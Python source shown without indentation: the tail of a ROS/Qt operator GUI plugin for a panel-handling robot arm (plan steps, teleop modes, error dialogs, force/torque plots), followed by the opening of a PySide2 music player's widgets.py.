self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
if(self.planListIndex+1==self._runscreen.planList.count()):
self.planListIndex=0
elif(self.recover_from_pause):
self.recover_from_pause=False
#TODO test this
else:
self.planListIndex+=1
#g=GUIStepGoal(self.gui_execute_states[self.planListIndex], self.panel_type)
#self.client_handle=self.client.send_goal(g,done_cb=self._process_done,feedback_cb=self._feedback_receive)
self.step_executor._nextPlan(self.panel_type,self.planListIndex,self.placement_target)
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
#errored
if(self.rewound):
self.rewound=False
self._runscreen.previousPlan.setDisabled(False)
else:
self.planListIndex+=1
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
"""
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Not Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("Biased to 0")
self._runscreen.pressureSensor.setText("[0,0,0]")
"""
'''
elif(self.planListIndex==1):
self.send_thread=threading.Thread(target=self._execute_steps,args=(1,self.last_step, self.panel_type,0))
rospy.loginfo("thread_started")
self.send_thread.setDaemon(True)
self.send_thread.start()
self._send_event.set()
#self._execute_step('plan_pickup_prepare',self.panel_type)
#self._execute_step('move_pickup_prepare')'''"""
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("ON")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[0,0,0]")
""""""
elif(self.planListIndex==2):
self.send_thread=threading.Thread(target=self._execute_steps,args=(2,self.last_step))
self.send_thread.setDaemon(True)
self.send_thread.start()
self._send_event.set()""""""
self._execute_step('plan_pickup_lower')
self._execute_step('move_pickup_lower')
self._execute_step('plan_pickup_grab_first_step')
self._execute_step('move_pickup_grab_first_step')
self._execute_step('plan_pickup_grab_second_step')
self._execute_step('move_pickup_grab_second_step')
self._execute_step('plan_pickup_raise')
self._execute_step('move_pickup_raise')
self._runscreen.vacuum.setText("OFF")
self._runscreen.panel.setText("Detached")
self._runscreen.panelTag.setText("Localized")self.controller_commander=controller_commander_pkg.arm_composites_manufacturing_controller_commander()
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[0,0,0]")
""""""
elif(self.planListIndex==3):
if(self.panel_type=="leeward_mid_panel"):
subprocess.Popen(['python', self.YC_transport_code, 'leeward_mid_panel'])
elif(self.panel_type=="leeward_tip_panel"):
subprocess.Popen(['python', self.YC_transport_code, 'leeward_tip_panel'])
self.commands_sent=True
"""
#self.send_thread=threading.Thread(target=self._execute_steps,args=(3,self.last_step,self.placement_target,0))
#self.send_thread.setDaemon(True)
#self.send_thread.start()
#self._send_event.set()"""
"""
self._execute_step('plan_transport_payload',self.placement_target)
self._execute_step('move_transport_payload')
self._runscreen.vacuum.setText("ON")
self._runscreen.panel.setText("Attached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("ON")
self._runscreen.pressureSensor.setText("[1,1,1]")
""""""
elif(self.planListIndex==4):
if(self.panel_type=="leeward_mid_panel"):
subprocess.Popen(['python', self.YC_place_code])
elif(self.panel_type=="leeward_tip_panel"):
subprocess.Popen(['python', self.YC_place_code2])
self.commands_sent=True
""""""
self._runscreen.vacuum.setText("ON")
self._runscreen.panel.setText("Attached")
self._runscreen.panelTag.setText("Localized")
self._runscreen.nestTag.setText("Not Localized")
self._runscreen.overheadCamera.setText("OFF")
self._runscreen.gripperCamera.setText("OFF")
self._runscreen.forceSensor.setText("OFF")
self._runscreen.pressureSensor.setText("[1,1,1]")
"""
def _stopPlan(self):
#self.client.cancel_all_goals()
#self.process_client.cancel_all_goals()
#g=GUIStepGoal("stop_plan", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive)
self.plan_list_reset()
if(self.shared_control_enabled):
self.start_shared_control()
if(self.planListIndex!=0):
self._runscreen.planList.item(self.planListIndex-1).setBackground(Qt.white)
self._runscreen.planList.item(self.planListIndex-1).setForeground(Qt.darkGray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self.step_executor._stopPlan()
self.recover_from_pause=True
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self._runscreen.stopPlan.setDisabled(True)
self.reset_teleop_button()
def _previousPlan(self):
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self.plan_list_reset()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
if(self.planListIndex==0):
pass
#elif(self.recover_from_pause):
else:
self.planListIndex-=1
self.recover_from_pause=False
self.reset_teleop_button()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self._runscreen.stopPlan.setDisabled(False)
self.rewound=True
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
#errored
#self._runscreen.previousPlan.setDisabled(True)
#g=GUIStepGoal("previous_plan", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive,done_cb=self._process_done)
self.step_executor._previousPlan()
@pyqtSlot()
def _feedback_receive(self):
with self._lock:
self.errored=True
messagewindow=QMessageBox()
messagewindow.setStyleSheet("QMessageBox{background: rgb(255,255,255); border: none;font-family: Arial; font-style: normal; font-size: 20pt; color: #000000 ; }")
button=QPushButton("Continue")
button.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
error_msg='Operation failed with error:\n'+self.step_executor.error
messagewindow.setText(error_msg)
messagewindow.addButton(button,QMessageBox.AcceptRole)
ret = messagewindow.exec_()
#confirm=QMessageBox.warning(messagewindow, 'Error',error_msg)
#messagewindow.informativeText.setFont(f)
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self._runscreen.stopPlan.setDisabled(True)
self.plan_list_reset()
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.yellow)
self.repaint_signal.emit()
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
if(self.rewound):
self.rewound=False
else:
if('reset' in self.step_executor.state):
self.planListIndex=self.pre_reset_list_index
elif('pickup_grab' not in self.step_executor.state and 'gripper' not in self.step_executor.state):
#if not (self.recover_from_pause):
# self.planListIndex-=1
icon=QIcon()
icon.addPixmap(QPixmap(self.retry_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
else:
self._runscreen.nextPlan.setDisabled(True)
def process_state_set(self):
#if(data.state!="moving"):
self.plan_list_reset()
self._runscreen.stopPlan.setDisabled(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.green)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.white)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
#rospy.loginfo("errored status:"+str(self.errored))
def _reset_position(self):
messagewindow=QMessageBox()
messagewindow.setStyleSheet("QMessageBox{background: rgb(255,255,255); border: none;font-family: Arial; font-style: normal; font-size: 20pt; color: #000000 ; }")
yesbutton=QPushButton("Yes")
nobutton=QPushButton("No")
yesbutton.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
nobutton.setStyleSheet('QPushButton {font-family:Arial;font-style:normal;font-size:20pt;}')
messagewindow.setText('Proceed to Reset Position?')
messagewindow.addButton(nobutton,QMessageBox.NoRole)
messagewindow.addButton(yesbutton,QMessageBox.AcceptRole)
reply = messagewindow.exec_()
rospy.loginfo(str(reply))
#messagewindow=VacuumConfirm()
#reply = QMessageBox.question(messagewindow, 'Path Verification',
#'Proceed to Reset Position', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
if reply==1:
self.pre_reset_list_index=self.planListIndex
self._runscreen.stopPlan.setDisabled(False)
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
self.repaint_signal.emit()
self.planListIndex=0
#g=GUIStepGoal("reset", self.panel_type)
#self.client_handle=self.client.send_goal(g,feedback_cb=self._feedback_receive)
self.reset_teleop_button()
self.step_executor._nextPlan(None,self.planListIndex)
#self._runscreen.planList.item(self.planListIndex).setSelected(True)
self._runscreen.planList.item(self.planListIndex).setForeground(Qt.red)
self._runscreen.planList.item(self.planListIndex).setBackground(Qt.gray)
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
#subprocess.Popen(['python', self.reset_code])
#errored
if(self.errored):
icon=QIcon()
icon.addPixmap(QPixmap(self.play_button))
self._runscreen.nextPlan.setIcon(icon)
self._runscreen.nextPlan.setIconSize(QSize(100,100))
self.errored=False
else:
rospy.loginfo("Reset Rejected")
def start_shared_control(self):
self.shared_control_enabled=not(self.shared_control_enabled)
if(self.shared_control_enabled):
self.step_executor.controller_mode=ControllerMode.MODE_SHARED_TRAJECTORY
self._runscreen.sharedControl.setStyleSheet('QPushButton {background-color: orange; color: white;}')
'''
button = QtGui.QPushButton()
palette = self.button.palette()
role = self.button.backgroundRole() #choose whatever you like
palette.setColor(role, QColor('red'))
button.setPalette(palette)
self.button.setAutoFillBackground(True)
'''
else:
self.step_executor.controller_mode=ControllerMode.MODE_AUTO_TRAJECTORY
self._runscreen.sharedControl.setStyleSheet('QPushButton {background-color: white; color: black;}')
def change_teleop_modes(self):
#with self._lock:
self.current_teleop_mode+=1
try:
if(self.current_teleop_mode==len(self.teleop_modes)):
self.current_teleop_mode=1
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
elif(self.current_teleop_mode==1):
self.reset_teleop_button()
elif(self.current_teleop_mode==2):
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_JOINT_TELEOP,1,[],[])
self.set_controller_mode(ControllerMode.MODE_JOINT_TELEOP,1,[],[])
elif(self.current_teleop_mode==3):
self.set_controller_mode(ControllerMode.MODE_CARTESIAN_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_CARTESIAN_TELEOP,1,[],[])
elif(self.current_teleop_mode==4):
self.set_controller_mode(ControllerMode.MODE_CYLINDRICAL_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_CYLINDRICAL_TELEOP,1,[],[])
elif(self.current_teleop_mode==5):
self.set_controller_mode(ControllerMode.MODE_SPHERICAL_TELEOP,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_SPHERICAL_TELEOP,1,[],[])
rospy.loginfo("Entering teleop mode:"+self.teleop_modes[self.current_teleop_mode])
button_string=self.teleop_button_string+self.teleop_modes[self.current_teleop_mode]
self._runscreen.accessTeleop.setText(button_string)
except Exception as err:
rospy.loginfo(str(err))
self.step_executor.error="Controller failed to set teleop mode"
self.step_executor.error_signal.emit()
def set_controller_mode(self,mode,speed_scalar=1.0,ft_bias=[], ft_threshold=[]):
req=SetControllerModeRequest()
req.mode.mode=mode
req.speed_scalar=speed_scalar
req.ft_bias=ft_bias
req.ft_stop_threshold=ft_threshold
res=self._set_controller_mode(req)
if (res.error_code.mode != ControllerMode.MODE_SUCCESS):
self.step_executor.error="GUI failed to set controller mode"
self.step_executor.error_signal.emit()
def error_recovery_button(self):
self.current_teleop_mode=0
def reset_teleop_button(self):
self.current_teleop_mode=1
self.set_controller_mode(ControllerMode.MODE_HALT,1,[],[])
#self.controller_commander.set_controller_mode(self.controller_commander.MODE_HALT,1,[],[])
button_string=self.teleop_button_string+self.teleop_modes[self.current_teleop_mode]
self._runscreen.accessTeleop.setText(button_string)
def plan_list_reset(self):
for i in range(self._runscreen.planList.count()):
self._runscreen.planList.item(i).setForeground(Qt.darkGray)
self._runscreen.planList.item(i).setBackground(Qt.white)
self.repaint_signal.emit()
#self._runscreen.planList.item(self.planListIndex).setHidden(True)
#self._runscreen.planList.item(self.planListIndex).setHidden(False)
def start_skipping(self):
self.skipping=not(self.skipping)
if(self.skipping):
self._runscreen.skipCommands.setStyleSheet('QPushButton {background-color: orange; color: white;}')
'''
button = QtGui.QPushButton()
palette = self.button.palette()
role = self.button.backgroundRole() #choose whatever you like
palette.setColor(role, QColor('red'))
button.setPalette(palette)
self.button.setAutoFillBackground(True)
'''
else:
self._runscreen.skipCommands.setStyleSheet('QPushButton {background-color: white; color: black;}')
def callback(self,data):
with self.callback_lock:
self.callback_msg=data
def callback_gui(self,evt):
#self._widget.State_info.append(data.mode)
#print "callback " + str(time.time())
with self.callback_lock:
data = self.callback_msg
if data is None:
return
if(self.stackedWidget.currentIndex()==0):
service_list=rosservice.get_service_list()
if('/overhead_camera/camera_trigger' in service_list):
self.led_change(self.overheadcameraled,True)
else:
self.led_change(self.overheadcameraled,False)
if('/gripper_camera_2/camera_trigger' in service_list):
self.led_change(self.grippercameraled,True)
else:
self.led_change(self.grippercameraled,False)
if(self.stackedWidget.currentIndex()==2):
if(self.count>10):
#stringdata=str(data.mode)
#freeBytes.acquire()
#####consoleData.append(str(data.mode))
self._errordiagnosticscreen.consoleWidget_2.addItem(str(data.joint_position))
self.count=0
#print data.joint_position
self.count+=1
#self._widget.State_info.scrollToBottom()
#usedBytes.release()
#self._data_array.append(stringdata)
#print self._widget.State_info.count()
if(self._errordiagnosticscreen.consoleWidget_2.count()>200):
item=self._errordiagnosticscreen.consoleWidget_2.takeItem(0)
#print "Hello Im maxed out"
del item
'''
if self.in_process:
if self.client.get_state() == actionlib.GoalStatus.PENDING or self.client.get_state() == actionlib.GoalStatus.ACTIVE:
self._runscreen.nextPlan.setDisabled(True)
self._runscreen.previousPlan.setDisabled(True)
self._runscreen.resetToHome.setDisabled(True)
rospy.loginfo("Pending")
elif self.client.get_state() == actionlib.GoalStatus.SUCCEEDED:
self._runscreen.nextPlan.setDisabled(False)
self._runscreen.previousPlan.setDisabled(False)
self._runscreen.resetToHome.setDisabled(False)
self.in_process=False
rospy.loginfo("Succeeded")
elif self.client.get_state() == actionlib.GoalStatus.ABORTED:
self.in_process=False
if(not self.recover_from_pause):
raise Exception("Process step failed and aborted")
elif self.client.get_state() == actionlib.GoalStatus.REJECTED:
self.in_process=False
raise Exception("Process step failed and Rejected")
elif self.client.get_state() == actionlib.GoalStatus.LOST:
self.in_process=False
raise Exception("Process step failed and lost")
'''
#if(self.count>10):
# self.count=0
if(data.mode.mode<0):
'''
#self.stackedWidget.setCurrentIndex(2)
if(data.mode.mode==-5 or data.mode.mode==-6):
error_msg="Error mode %d : Controller is not synched or is in Invalid State" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-3 or data.mode.mode==-2):
error_msg="Error mode %d : Controller operation or argument is invalid" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-13 or data.mode.mode==-14):
error_msg="Error mode %d : Sensor fault or communication Error" %data.mode.mode
self._errordiagnosticscreen.errorLog.setPlainText(error_msg)
if(data.mode.mode==-1):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -1: Internal system error detected")
if(data.mode.mode==-4):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -4: Robot Fault detected")
if(data.mode.mode==-7):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -7: Robot singularity detected, controller cannot perform movement")
if(data.mode.mode==-8):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -8: Robot Setpoint could not be tracked, robot location uncertain")
if(data.mode.mode==-9):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -9: Commanded Trajectory is invalid and cannot be executed. Please replan")
if(data.mode.mode==-10):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -10: Trajectory Tracking Error detected, robot position uncertain, consider lowering speed of operation to improve tracking")
if(data.mode.mode==-11):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -11: Robot trajectory aborted.")
if(data.mode.mode==-12):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -12: Robot Collision Imminent, operation stopped to prevent damage")
if(data.mode.mode==-15):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -15: Sensor state is invalid")
if(data.mode.mode==-16):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -16: Force Torque Threshold Violation detected, stopping motion to prevent potential collisions/damage")
if(data.mode.mode==-17):
self._errordiagnosticscreen.errorLog.setPlainText("Error mode -17: Invalid External Setpoint given")
'''
#messagewindow=VacuumConfirm()
#reply = QMessageBox.question(messagewindow, 'Connection Lost',
# 'Robot Connection Lost, Return to Welcome Screen?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)
#if reply==QMessageBox.Yes:
#
# self.disconnectreturnoption=False
#else:
# self.disconnectreturnoption=True
if(data.mode.mode==-16 and "pickup_grab" in self.step_executor.state):
pass
else:
self.led_change(self.robotconnectionled,False)
self.led_change(self.runscreenstatusled,False)
self.error_recovery_button()
self._runscreen.accessTeleop.setText("Recover from\n Error Code:"+str(data.mode.mode))
else:
self.led_change(self.robotconnectionled,True)
self.led_change(self.runscreenstatusled,True)
#if(self.advancedmode):
self._runscreen.readout.setText(str(data.ft_wrench))
if(data.ft_wrench_valid=="False"):
self.stackedWidget.setCurrentIndex(0)
self.led_change(self.forcetorqueled,False)
else:
self.led_change(self.forcetorqueled,True)
#self.service_list=rosservice.get_service_list()
#if(self.disconnectreturnoption and data.error_msg==""):
# self.disconnectreturnoption=False
#self.count+=1
if(not self.force_torque_plot_widget.isHidden()):
self.x_data=np.concatenate((self.x_data,[data.header.seq]))
incoming=np.array([data.ft_wrench.torque.x,data.ft_wrench.torque.y,data.ft_wrench.torque.z,data.ft_wrench.force.x,data.ft_wrench.force.y,data.ft_wrench.force.z]).reshape(6,1)
self.force_torque_data=np.concatenate((self.force_torque_data,incoming),axis=1)
if(self.data_count>500):
self.force_torque_data=self.force_torque_data[...,1:]
self.x_data=self.x_data[1:]
self.force_torque_plot_widget.setRange(xRange=(self.x_data[1],self.x_data[-1]))
else:
self.data_count+=1
for i in range(6):
self.plot_container[i].setData(self.x_data,self.force_torque_data[i,...])
self.force_torque_app.processEvents()
if(not self.joint_angle_plot_widget.isHidden()):
self.x_data=np.concatenate((self.x_data,[data.header.seq]))
incoming=np.array([data.ft_wrench.torque.x,data.ft_wrench.torque.y,data.ft_wrench.torque.z,data.ft_wrench.force.x,data.ft_wrench.force.y,data.ft_wrench.force.z]).reshape(7,1)
self.joint_angle_data=np.concatenate((self.joint_angle_data,incoming),axis=1)
if(self.data_count>500):
self.joint_angle_data=self.joint_angle_data[...,1:]
self.x_data=self.x_data[1:]
self.joint_angle_plot_widget.setRange(xRange=(self.x_data[1],self.x_data[-1]))
else:
self.data_count+=1
for i in range(7):
self.plot_container[i].setData(self.x_data,self.joint_angle_data[i,...])
self.joint_angle_app.processEvents()
#if(len(self._data_array)>10):
# for x in self._data_array:
# self._widget.State_info.append(x)
def _repaint(self):
self._runscreen.planList.item(self.planListIndex).setHidden(True)
self._runscreen.planList.item(self.planListIndex).setHidden(False)
def shutdown_plugin(self):
# TODO unregister all publishers here
pass
def save_settings(self, plugin_settings, instance_settings):
# TODO save intrinsic configuration, usually using:
# instance_settings.set_value(k, v)
pass
def restore_settings(self, plugin_settings, instance_settings):
# TODO restore intrinsic configuration, usually using:
# v = instance_settings.value(k)
pass
#def trigger_configuration(self):
# Comment in to signal that the plugin has a way to configure
# This will enable a setting button (gear icon) in each dock widget title bar
# Usually used to open a modal configuration dialog
|
widgets.py
|
#
# widgets.py
# Classes for widgets and windows
#
from PySide2 import QtWidgets, QtCore, QtGui, QtMultimedia
import lib
import os
from playlist import PlaylistModel, PlaylistView
import mutagen
from typing import List
import threading
import time
is_admin = lib.getAdminStatus()
if is_admin:
import keyboard
class MainWindow(QtWidgets.QMainWindow):
# - init:
# - Call init on super
# - Set geometry variables from geometry key in config if the key exists, otherwise set them to defaults
# - Set app from QApplication parameter
# - Set player fade rates
# - Call initUI
# - initUI:
# - Set geometry and title
# - Set variable with path to executable to find resources later on
# - Create widgets: buttons for media controls, labels, sliders
# - Initialise player, connect to time and volume sliders
# - Set to paused state
# - Update the duration to 0
# - Initialise playlist
# - Add widgets to layout
# - Create central widget and set layout on central widget
# - Create menus and shortcuts
# - If the player was in the mini layout last launch, switch to the mini layout
# - Set volume from config dictionary, add the media from the config, set the current playlist index from the config, reset lastMediaCount, isTransitioning, isFading, lastVolume and currentLayout variables and reset the metadata
# - Set variables for fade out and in rates
# - Set the minimum size to the current minimum size
# - If the config contains it, load and set the minimum size, otherwise if the layout is set to standard, save the minimum size to the config dictionary and to disk
# - Show
def __init__(self, app: QtWidgets.QApplication):
super().__init__()
if lib.config.__contains__("geometry") and lib.config["geometry"].__contains__("mainWindow"):
geometry = lib.config["geometry"]["mainWindow"]
self.left = geometry["left"]
self.top = geometry["top"]
self.width = geometry["width"]
self.height = geometry["height"]
else:
self.left = lib.defaultLeft
self.top = lib.defaultTop
self.width = lib.defaultWidth
self.height = lib.defaultHeight
if not lib.config.__contains__("geometry"):
lib.config["geometry"] = {}
lib.config["geometry"]["mainWindow"] = {}
lib.config["geometry"]["mainWindow"]["left"] = self.left
lib.config["geometry"]["mainWindow"]["top"] = self.top
lib.config["geometry"]["mainWindow"]["width"] = self.width
lib.config["geometry"]["mainWindow"]["height"] = self.height
self.width_mini = lib.miniWidth
self.height_mini = lib.miniHeight
self.title = lib.progName
self.app = app
self.rate_ms_fadeOut = 200
self.rate_ms_fadeIn = 200
self.initUI()
def initUI(self):
self.setGeometry(self.left, self.top, self.width, self.height)
self.setWindowTitle(self.title)
self.createWidgets()
self.initPlayer()
self.initPlaylist()
self.init_playpause()
self.connect_update_media()
self.createLayout()
self.createCentralWidget()
self.createMenus()
self.createShortcuts()
self.originalMinimumSize = self.minimumSize()
if lib.config.__contains__("layout"):
self.currentLayout = lib.config["layout"]
self.switchLayout(self.currentLayout)
else:
self.currentLayout = lib.config["layout"] = 0
self.switchLayout(self.currentLayout)
self.setVolume(lib.config["volume"])
self.addMediaFromConfig()
self.setPlaylistIndexFromConfig()
self.lastMediaCount = 0
self.isTransitioning = False
self.isFading = False
self.lastVolume = self.player.volume()
self.metadata = None
if self.currentLayout == 0 and not lib.config.__contains__("mainWindow_minSize"):
self.originalMinimumSize = self.minimumSize()
lib.config["mainWindow_minSize"] = {}
lib.config["mainWindow_minSize"]["w"] = self.originalMinimumSize.width()
lib.config["mainWindow_minSize"]["h"] = self.originalMinimumSize.height()
lib.writeToMainConfigJSON(lib.config)
elif lib.config.__contains__("mainWindow_minSize"):
minSize = lib.config["mainWindow_minSize"]
self.originalMinimumSize = QtCore.QSize(minSize["w"], minSize["h"])
self.show()
def moveEvent(self, event: QtGui.QMoveEvent):
# Set the left and top keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["mainWindow"]["left"] = self.geometry().left()
lib.config["geometry"]["mainWindow"]["top"] = self.geometry().top()
lib.writeToMainConfigJSON(lib.config)
def resizeEvent(self, event: QtGui.QResizeEvent):
# Set the width and height keys in the geometry key of the config dictionary to the corresponding geometric values and write the config to disk
lib.config["geometry"]["mainWindow"]["width"] = self.geometry().width()
lib.config["geometry"]["mainWindow"]["height"] = self.geometry().height()
lib.writeToMainConfigJSON(lib.config)
def createWidgets(self):
# Create buttons, labels and sliders
self.control_playpause = QtWidgets.QPushButton()
self.control_playpause.setFixedWidth(85)
self.control_previous = QtWidgets.QPushButton(self.tr("Previous"))
self.control_next = QtWidgets.QPushButton(self.tr("Next"))
self.volumeSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.volumeSlider.setMaximum(100)
self.volumeSlider.setValue(100)
self.timeSlider = QtWidgets.QSlider(QtCore.Qt.Horizontal)
self.timePositionLabel = QtWidgets.QLabel(lib.to_hhmmss(0))
self.totalTimeLabel = QtWidgets.QLabel(lib.to_hhmmss(0))
lib.setAltLabelStyle(self.timePositionLabel)
lib.setAltLabelStyle(self.totalTimeLabel)
self.metadata_label = QtWidgets.QLabel()
lib.setAltLabelStyle(self.metadata_label)
self.metadata_label.hide()
self.coverart_label = QtWidgets.QLabel()
self.coverart_label.hide()
self.coverart_width = 64
self.basichelp_label = ClickableLabel("""Welcome to QMusic, to get started go to File --> Open or drag and drop a song or folder into the window""")
self.basichelp_label.setWordWrap(True)
lib.setAltLabelStyle(self.basichelp_label)
self.basichelp_label.hide()
self.basichelp_label.pressed.connect(self.basichelp_label.hide)
# Create playlist and action buttons, connect pressed signals
self.control_playlist_moveDown = QtWidgets.QPushButton(self.tr("Move Down"))
self.control_playlist_moveUp = QtWidgets.QPushButton(self.tr("Move Up"))
self.control_playlist_remove = QtWidgets.QPushButton(self.tr("Remove"))
self.control_playlist_clear = QtWidgets.QPushButton(self.tr("Clear"))
self.control_playlist_moveDown.pressed.connect(self.playlist_moveDown)
self.control_playlist_moveUp.pressed.connect(self.playlist_moveUp)
self.control_playlist_remove.pressed.connect(self.removeMedia)
self.control_playlist_clear.pressed.connect(self.playlist_clear)
self.lyricsView = None
def initPlayer(self):
# Create QMediaPlayer and connect to time and volume sliders value changed members, connect player position/duration changed to update position and duration methods
self.player = QtMultimedia.QMediaPlayer()
self.volumeSlider.valueChanged.connect(self.setVolume)
# Note: self.player.setPosition adds pauses to playback
self.timeSlider.valueChanged.connect(self.setPosition)
self.player.durationChanged.connect(self.update_duration)
self.player.positionChanged.connect(self.update_position)
def setVolume(self, volume: int):
# Set the player volume, set the slider position and update the main config
self.player.setVolume(volume)
self.volumeSlider.setSliderPosition(volume)
lib.updateMainConfig("volume", volume)
def setPosition(self, position: int):
# Get player position and if the new slider position has changed, set the player position
player_position = self.player.position()
if position > player_position + 1 or position < player_position - 1:
self.player.setPosition(position)
# If position is near the end, fade out
duration = self.player.duration()
if not self.isTransitioning and position > duration - 1000:
self.isTransitioning = True
self.fadeOut()
# If transitioning and the new track has started, reset the transitioning state and restore volume
if self.isTransitioning and not self.isFading and position < duration - 1000:
self.fadeIn()
def fadeOut(self):
# Run the fade out on a new thread with the function set as the target for the thread and by calling start
self.fadeThread = threading.Thread(target=self._fadeOut)
self.fadeThread.start()
def _fadeOut(self):
# Set the last volume and lower volume by incriment every x ms until the volume is equal to 0, exit if the track has already switched
self.lastVolume = self.player.volume()
volume = self.lastVolume
self.lastTrackIndex = self.playlist.currentIndex()
while volume != 0 and self.playlist.currentIndex() == self.lastTrackIndex:
volume -= 1
self.player.setVolume(volume)
self.isFading = True
time.sleep(1 / self.rate_ms_fadeOut)
# If not fading and the track has changed, instantly restore the volume to prevent volume from staying at 0
if not self.isFading and self.playlist.currentIndex() != self.lastTrackIndex:
self.restoreVolume()
self.isFading = False
def fadeIn(self):
# Run the fade in on a new thread with the function set as the target for the thread and by calling start
self.fadeThread = threading.Thread(target=self._fadeIn)
self.fadeThread.start()
def _fadeIn(self):
# Increase volume by incriment every x ms until the volume has reached the pre-fade volume, reset isTransitioning
volume = self.player.volume()
while volume != self.lastVolume:
volume += 1
self.player.setVolume(volume)
self.isFading = True
time.sleep(1 / self.rate_ms_fadeIn)
self.isFading = False
self.isTransitioning = False
def restoreVolume(self):
# Set the player volume to the last recorded volume
self.player.setVolume(self.lastVolume)
def update_duration(self, duration: int):
# Set time slider maximum and set total time label text formatted from argument
self.timeSlider.setMaximum(duration)
